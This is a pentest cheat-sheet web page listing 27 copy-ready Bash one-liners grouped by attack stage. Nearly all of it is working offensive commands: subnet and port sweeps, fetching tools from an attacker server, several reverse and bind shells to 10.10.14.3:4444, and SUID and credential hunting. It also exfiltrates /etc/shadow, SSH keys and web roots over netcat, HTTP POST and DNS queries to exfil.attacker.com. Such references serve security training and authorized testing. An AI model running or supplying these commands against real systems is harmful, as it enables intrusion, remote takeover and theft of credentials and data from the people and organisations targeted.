Bash One-Liners Cheat Sheet

Copy-ready Bash one-liners for host discovery, file transfer, reverse shells, local enumeration, and data exfiltration during authorized pentests. (27 payloads)

Build custom Bash One-Liners payloads in the Reverse Shell generator

Host Discovery & Port Scanning

(5)

for i in $(seq 1 254); do (ping -c1 -W1 192.168.1.$i &>/dev/null && echo "192.168.1.$i up") & done; wait

ICMP ping sweep across a /24 in parallel to find live hosts when nmap isn't available.Linux. ICMP may be filtered; absence of a reply does not mean the host is down.

for p in $(seq 1 1024); do (echo > /dev/tcp/10.10.10.5/$p) 2>/dev/null && echo "port $p open"; done

Pure-Bash TCP port scan using the /dev/tcp pseudo-device, no external scanner required.Works only in bash (not dash/sh) and only when bash is compiled with --enable-net-redirections.

nc -zv 10.10.10.5 1-1024 2>&1 | grep -i succeeded

Connect-scan a port range with netcat's zero-I/O mode and show only open ports.Use traditional/OpenBSD nc. The -z flag may be unavailable on some nc variants (e.g. ncat).

timeout 1 bash -c "echo > /dev/tcp/10.10.10.5/22" && echo "22 open" || echo "22 closed/filtered"

Single-port reachability check with a hard timeout so filtered ports fail fast.Good for verifying one service (SSH/HTTP) without pulling in a full scanner.

for ip in $(seq 1 254); do timeout 1 bash -c "echo > /dev/tcp/192.168.1.$ip/445" 2>/dev/null && echo "192.168.1.$ip:445 open"; done

Sweep an entire subnet for a specific open port (here SMB/445) using only Bash.Swap the port to hunt for RDP (3389), HTTP (80), or SSH (22) across the range.

File Transfer

(6)

python3 -m http.server 8000

Spin up a quick HTTP server in the current directory to host tools/payloads for the target to pull.Run on the attacker box. Target fetches with wget/curl. Use python2: python -m SimpleHTTPServer 8000.

curl -s http://10.10.14.3:8000/linpeas.sh -o /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh

Download a script to the target with curl and make it executable./tmp and /dev/shm are usually writable; /dev/shm avoids leaving artifacts on disk in some setups.

wget -q http://10.10.14.3:8000/tool -O /tmp/tool

Quietly fetch a file with wget when curl is absent on the target.Many minimal containers ship neither; check with `command -v curl wget` first.

exec 3<>/dev/tcp/10.10.14.3/8000; echo -e "GET /file HTTP/1.0\r\n\r\n" >&3; cat <&3 > /tmp/file

Download a file over a raw TCP socket using Bash /dev/tcp when no HTTP client exists.Last-resort transfer on stripped boxes. You'll need to strip HTTP response headers from the saved file.

nc -lvnp 4444 > received.file # receiver\nnc -w3 10.10.14.3 4444 < secret.file # sender

Transfer a file between two hosts with netcat: listener writes to disk, sender pipes the file in.Start the listener first. Connection closes when the sender's stdin (file) ends.

scp file.txt [email protected]:/tmp/ # or: scp [email protected]:/tmp/file.txt .

Copy files to/from a host over SSH when you already hold valid credentials or a key.The cleanest, encrypted option once you have SSH access; respects existing auth and logging.

Reverse & Bind Shells

(5)

bash -i >& /dev/tcp/10.10.14.3/4444 0>&1

Classic Bash reverse shell over /dev/tcp back to a netcat listener on the attacker box.Start `nc -lvnp 4444` first. Requires net-redirection-enabled bash; fails under dash/sh.

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 10.10.14.3 4444 > /tmp/f

Named-pipe (FIFO) reverse shell that works even when nc lacks the -e execute flag.The most portable nc reverse shell; relies only on mkfifo, sh, and a basic nc.

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.10.14.3",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn("/bin/bash")'

Python reverse shell that spawns a PTY, giving a more interactive shell out of the gate.Preferred when Python is present; pty.spawn yields job control and working tab-completion.

nc -lvnp 4444 -e /bin/bash # listener serves a bind shell; connect with: nc 10.10.10.5 4444

Bind shell: target listens on a port and hands a shell to whoever connects.Only works with nc variants that support -e (GNU/ncat). Useful when the target can't reach back out.

python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm; stty raw -echo; fg

Upgrade a dumb reverse shell to a fully interactive TTY (Ctrl-C, arrows, tab work).Run the pty line in the shell, then `Ctrl-Z`, run `stty raw -echo; fg` locally, then press Enter.

Local Enumeration & PrivEsc Hunting

(6)

find / -perm -4000 -type f 2>/dev/null

Find all SUID binaries on the system, a primary lead for privilege escalation.Cross-reference results against GTFOBins. -6000 finds both SUID and SGID.

find / -writable -type d 2>/dev/null

List directories the current user can write to, useful for staging payloads or PATH hijacks.Combine with `find / -perm -2 -type f` to locate world-writable files.

sudo -l

List commands the current user may run via sudo, often the fastest path to root.May prompt for a password and is logged. NOPASSWD entries against GTFOBins binaries are gold.

getcap -r / 2>/dev/null

Enumerate file capabilities (e.g. cap_setuid) that can grant privileges without the SUID bit.cap_setuid+ep on python/perl is a well-known root path; check GTFOBins for the exploit.

find / -name '*.conf' -o -name '*.config' 2>/dev/null | xargs grep -liE 'password|passwd|secret|api[_-]?key' 2>/dev/null

Grep config files for hardcoded credentials and secrets across the filesystem.Also check ~/.bash_history, ~/.ssh, /var/www, and environment with `env`.

cat /etc/crontab; ls -la /etc/cron.* /var/spool/cron 2>/dev/null

Inspect scheduled jobs for root-run scripts you can modify or PATH-hijack.A writable script invoked by a root cron is a classic privesc; verify ownership and permissions.

Data Exfiltration & Encoding

(5)

tar czf - /etc/passwd /home/user/.ssh | nc 10.10.14.3 4444 # listener: nc -lvnp 4444 > loot.tar.gz

Stream a compressed tar archive of multiple files/dirs to the attacker over netcat.No temp file on the target; start `nc -lvnp 4444 > loot.tar.gz` first. Only exfil in-scope data.

base64 -w0 /etc/shadow

Base64-encode a file to a single line for safe copy-paste exfil through a text-only channel.Decode on the attacker box with `base64 -d`. -w0 disables line wrapping. macOS uses `base64 -b 0`.

cat secret.db | gzip | base64 -w0 | curl -s -X POST --data-binary @- http://10.10.14.3:8000/x

Compress, base64-encode, and POST a file to an attacker-controlled endpoint in one pipe.Blends with normal HTTP egress; reverse on the server with `base64 -d | gunzip`.

tar czf - /var/www | openssl enc -aes-256-cbc -pbkdf2 -pass pass:Str0ngPass | nc 10.10.14.3 4444

Encrypt an archive in-stream before sending it over the wire to protect exfiltrated data.Decrypt on the receiver: `nc -lvnp 4444 | openssl enc -d -aes-256-cbc -pbkdf2 -pass pass:Str0ngPass | tar xzf -`.

for c in $(base64 -w0 file | fold -w63); do dig +short $c.exfil.attacker.com; done

Exfiltrate data via DNS by encoding it into subdomain labels queried against a controlled domain.Slow but bypasses egress filters that allow only DNS. Each label must stay under 63 chars.

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

Reverse Shell

Related Cheat Sheets

Reverse Shell Cheat Sheet Linux Privilege Escalation Cheat Sheet

Frequently asked questions

What is the Bash One-Liners Cheat Sheet?+

It's a quick-reference collection of 27 Bash One-Liners payloads for testing Bash One-Liners vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Bash One-Liners payloads?+

Copy any payload straight into your authorized test, or open the Reverse Shell generator to build customized Bash One-Liners variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.

Are these Bash One-Liners payloads free to use?+

Yes — this cheat sheet and all Bash One-Liners payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Bash One-Liners Cheat Sheet?+

How do I use these Bash One-Liners payloads?+

Are these Bash One-Liners payloads free to use?+

Yes — this cheat sheet and all Bash One-Liners payloads are completely free, with no account required. Everything runs in your browser.